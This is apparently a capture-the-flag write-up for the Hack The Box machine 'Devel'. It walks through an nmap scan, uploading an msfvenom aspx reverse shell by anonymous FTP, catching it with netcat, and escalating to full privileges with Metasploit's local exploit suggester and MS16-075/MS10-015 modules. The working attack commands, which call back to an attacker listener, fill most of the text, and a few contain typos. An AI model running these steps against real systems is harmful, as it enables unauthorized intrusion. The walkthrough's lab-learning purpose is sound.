Enumeration
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
The nmap result tells us the FTP server and web server are open.
The version of the web server is IIS 7.5.
For the FTP server, it allows anonymous login.
Also, we know that there are iisstart.htm and welcome.png
files.
If we visit the website, we can check these two files.
Using the FTP server
Since we can interact with the ftp server with anonymous login, it’s also possible to upload a script file as we want.
The web server is IIS 7.5 which uses aspx extension files.
To craft a reverse shell payload with aspx extension, I used msfvenom.
You can check the list of payloads and choose a proper one.
msfvenom -l payloads | grep windows
Then, I chose the windows/shell_reverse_tcp payload. Be aware that netcat can only handle stageless payloads
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=9999 -f aspx -o eon.aspx
Output the eon.aspx file and upload it to the web server via ftp server.
# After anonymous login to FTP
PUT eon.asxp
And listen to the port that I set.
nc -lvnp 9999
If I go to the 10.10.10.5/eon.aspx the shell will be connected.
c:\Users>whoami
whoami
iis apppool\web
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
However, we encounter a permission issue.
We don’t have any permissions to see the user and admin directories… 🙁
Privilege escalation
I googled to find information on privilege escalation.
Then, I found in metaslpoit, there is something called exploit suggest. It seems it suggests possible vulnerabilities that I can perform with the current session.
To use metasploit, I chose a payload windows/meterpreter/reverse_tcp.
To open a session in metasploit, we need to run /multi/handler
. It is like netcat in metasploit.
use expoit/multi/handler
set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.4:9999
[*] Sending stage (175686 bytes) to 10.10.10.5
whoami
[*] Meterpreter session 13 opened (10.10.14.4:9999 -> 10.10.10.5:49225) at 2024-04-21 21:31:34 -0400
We opened session 13, and it is a shell without permissions like we connected the reverse shell using netcat.
Next, we will use this open session for exploit suggestions.
Send the session to the background. ctrl+z
post/multi/recon/local_exploit_suggester
set session 13
After setting the required parameters for local_exploit_suggester, run it.
Then it gives us a list of potential vulnerabilities. You can choose one of them.
Some of them may work and some of them may not work. I tried 3, 10, 13 but 10 didn’t work.
Let’s use the number 13. windows/local/ms16_075_reflection_juicy
After setting the required parameters, you will get a new session with permissions.
The user flag is in babis’s home directory and the root flag is in Administrator’s directory.
Below presents the same result with another potential vulnerability windows/local/ms10_015_kitrap0d
.